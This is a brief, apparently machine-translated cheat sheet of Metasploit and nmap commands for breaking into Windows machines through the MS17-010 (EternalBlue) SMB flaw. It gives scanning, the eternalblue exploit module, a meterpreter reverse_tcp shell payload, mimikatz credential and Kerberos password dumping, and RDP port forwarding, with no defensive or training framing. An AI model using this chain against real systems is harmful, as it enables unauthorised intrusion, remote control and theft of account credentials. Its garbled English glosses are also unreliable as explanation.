nmap -sV -Pn xxxxx scan port and system information
use auxiliary/scanner/smb/smb_ms17_010 Scanner module
set Rhosts scan target
use exploit/windows/smb/ms17_010_eternalblue attack module
Need to set target ip
LISTEN
Native IP LHost
attack payload
set payload windows/x64/meterpreter/reverse_tcp
load mimikatz load mimikatz
msv export hash
kerberos get account password
port forwarding -
portfwd add -l 3389 -L 127.0.0.1 -p 3389 -r xxxxx target ip
Forward the target's 3389 to the local 3389